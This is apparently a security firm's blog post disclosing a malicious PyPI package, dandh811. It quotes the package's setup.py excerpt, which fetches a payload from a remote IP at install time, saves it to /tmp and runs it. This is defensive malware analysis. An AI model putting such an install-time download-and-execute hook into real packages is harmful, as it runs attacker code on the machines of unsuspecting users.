Another malicious Python package discovered

Reported Jan 04, 2022 by Ashish Bijlani

dandh811
downloads payload over http during installation malicious

test

28 Feb, 2021
PyPi Versions 10
dandh811
dandh811@163.com
Deps 1

Our static analysis module flagged package dandh811==0.0.10 as suspicious. So we decided to take a deeper look at the code, particularly the statements that were flagged by our technology as "risky". Upon further review we found that the package is indeed fishy! Here we discuss our findings.

At Ossillate, we are building a large-scale security analysis platform to vet PyPI Python packages for software supply chain attacks. Our free CLI and CI/CD tools can help developers adopt pre-vetted third-party open-source packages and ship faster.

Our technology-generated report shows that the package
- homepage redirects to injection.vip,
- uses network, file, and subprocess APIs in setup.py

Permissions

Show details

As setup.py contains the code that is executed immediately upon installation of a package, it is clear that the package trying to download a malicious payload from a remote server.

    handler = urllib2.urlopen("http://81.70.89.72/sectest/package/pypi/download")
    with open("/tmp/dandh811.py", "wb") as fp:
        fp.write(handler.read())
    subprocess.call(["python2", "/tmp/dandh811.py"])

Fig 1. setup.py downloads and executes a payload at runtime

Fig 1 above shows an excerpt from setup.py file. As seen, it first downloads a malicious payload sectest/package/pypi/download over insecure http channel. The payload is saved as /tmp/dandh811.py and executed it as a background process during the installation process.

We tried downloading the payload manually from 81.70.89.72, but the server was not reachable. ipinfo.io shows that this server is located in China.

We reported our findings to PyPI maintainers, and they have yanked this package as of Jan, 2022.